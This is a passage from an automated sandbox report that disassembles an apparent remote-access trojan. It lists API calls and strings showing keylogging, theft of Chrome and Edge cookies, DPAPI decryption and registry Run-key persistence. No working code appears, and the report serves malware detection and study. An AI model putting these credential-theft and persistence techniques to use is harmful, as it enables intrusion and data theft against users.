                                                                • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                                                • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                              • String ID: *?$.
                                                              • API String ID: 2812119850-3972193922
                                                              • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                              • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                              • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                              • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                              Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CountEventTick
                                                              • String ID: !D@$NG
                                                              • API String ID: 180926312-2721294649
                                                              • Opcode ID: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                              • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                              • Opcode Fuzzy Hash: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                              • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                              Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                              • String ID: XQG$NG$PG
                                                              • API String ID: 1634807452-3565412412
                                                              • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                              • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                              • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                              • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                              Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000104), ref: 00443515
                                                              • _free.LIBCMT ref: 004435E0
                                                              • _free.LIBCMT ref: 004435EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                                                              • API String ID: 2506810119-1308627793
                                                              • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                              • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                              • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                              • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                              Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                              • GetLastError.KERNEL32 ref: 0044B9B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharErrorFileLastMultiWideWrite
                                                              • String ID: PkGNG
                                                              • API String ID: 2456169464-263838557
                                                              • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                              • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                              • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                              • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                              Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                              • String ID: /sort "Visit Time" /stext "$0NG
                                                              • API String ID: 368326130-3219657780
                                                              • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                              • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                              • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                              • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                              Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00416330
                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CloseCreateValue
                                                              • String ID: !D@$okmode$PG
                                                              • API String ID: 3411444782-3370592832
                                                              • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                              • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                              • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                              • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                              Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                              Strings
                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                              • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                              • API String ID: 1174141254-1980882731
                                                              • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                              • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                              • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                              • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                              Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                              • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                              Strings
                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                              • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExistsFilePath
                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                              • API String ID: 1174141254-1980882731
                                                              • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                              • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                              • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                              • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                              Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTimewsprintf
                                                              • String ID: Offline Keylogger Started
                                                              • API String ID: 465354869-4114347211
                                                              • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                              • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                              • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                              • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                              Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                              • String ID: Online Keylogger Started
                                                              • API String ID: 112202259-1258561607
                                                              • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                              • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                              • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                              • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                              Function 0041B580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                              • API String ID: 481472006-3277280411
                                                              • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                              • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                              • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                              • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                              Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                              • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                              Strings
                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Create$EventLocalThreadTime
                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                              • API String ID: 2532271599-1507639952
                                                              • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                              • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                              • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                              • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                              Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: CryptUnprotectData$crypt32
                                                              • API String ID: 2574300362-2380590389
                                                              • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                              • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                              • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                              • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                              Function 0044C2D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                                              • GetLastError.KERNEL32 ref: 0044C316
                                                              • __dosmaperr.LIBCMT ref: 0044C31D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer__dosmaperr
                                                              • String ID: PkGNG
                                                              • API String ID: 2336955059-263838557
                                                              • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                              • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                                              • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                              • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                                              Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                              • CloseHandle.KERNEL32(?), ref: 004051CA
                                                              • SetEvent.KERNEL32(?), ref: 004051D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandleObjectSingleWait
                                                              • String ID: Connection Timeout
                                                              • API String ID: 2055531096-499159329
                                                              • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                              • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                              • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                              • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                              Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 2005118841-1866435925
                                                              • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                              • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                              • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                              • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                              Function 0041CB72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                              • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FormatFreeLocalMessage
                                                              • String ID: @J@$PkGNG
                                                              • API String ID: 1427518018-1416487119
                                                              • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                              • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                              • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                              • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                              Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                              • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateValue
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                              • API String ID: 1818849710-1051519024
                                                              • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                              • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                              • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                              • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                              Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                              • String ID: bad locale name
                                                              • API String ID: 3628047217-1405518554
                                                              • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                              • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                              • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                                              • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                              Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                              • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                              • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                              Strings
                                                              Memory Dump Source
